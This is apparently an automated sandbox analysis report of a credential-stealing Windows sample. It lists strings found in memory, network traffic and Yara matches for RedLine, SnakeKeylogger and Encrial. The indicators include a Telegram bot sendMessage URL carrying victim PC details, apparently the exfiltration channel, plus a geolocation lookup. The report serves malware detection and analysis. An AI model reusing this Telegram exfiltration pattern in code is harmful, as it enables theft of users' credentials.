                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002667000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:258555%0D%0ADate%20a
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003605000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003605000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003605000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002711000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.00000000026E5000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.000000000270C000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.00000000026E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en8
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003605000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003605000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003605000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002667000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002640000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002640000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.00000000025FA000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002667000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002640000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003605000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003605000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002742000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002733000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002733000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/8
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.000000000273D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49767 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, type: SAMPLEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 0.0.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: Process Memory Space: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe PID: 6748, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_00408C600_2_00408C60
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0040DC110_2_0040DC11
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_00407C3F0_2_00407C3F
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_00418CCC0_2_00418CCC
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_00406CA00_2_00406CA0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_004028B00_2_004028B0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0041A4BE0_2_0041A4BE
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_004182440_2_00418244
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_004016500_2_00401650
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_00402F200_2_00402F20
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_004193C40_2_004193C4
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_004187880_2_00418788
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_00402F890_2_00402F89
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_00402B900_2_00402B90
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_004073A00_2_004073A0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0216D20A0_2_0216D20A
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_021676300_2_02167630
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0216D7B80_2_0216D7B8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0216C4E00_2_0216C4E0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0216D4EA0_2_0216D4EA
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0216A5980_2_0216A598
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0216586F0_2_0216586F
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0216C9800_2_0216C980
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_02166EA80_2_02166EA8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_02162EF80_2_02162EF8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0216EEE00_2_0216EEE0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0216CF300_2_0216CF30
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0216CC580_2_0216CC58
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_021643110_2_02164311
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0216C6A80_2_0216C6A8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0216EED00_2_0216EED0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_061C1E980_2_061C1E98
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_061C0B300_2_061C0B30
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_061C17B00_2_061C17B0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_061C50480_2_061C5048
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_061C9C480_2_061C9C48
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_061C95780_2_061C9578
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_061C25800_2_061C2580
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_061CDE1F0_2_061CDE1F
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_061CDE300_2_061CDE30
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_061CE2880_2_061CE288
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_061C1E8A0_2_061C1E8A
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_061CE2850_2_061CE285
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_061CE6D00_2_061CE6D0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_061CE6E00_2_061CE6E0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_061CEB380_2_061CEB38
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_061CEB290_2_061CEB29
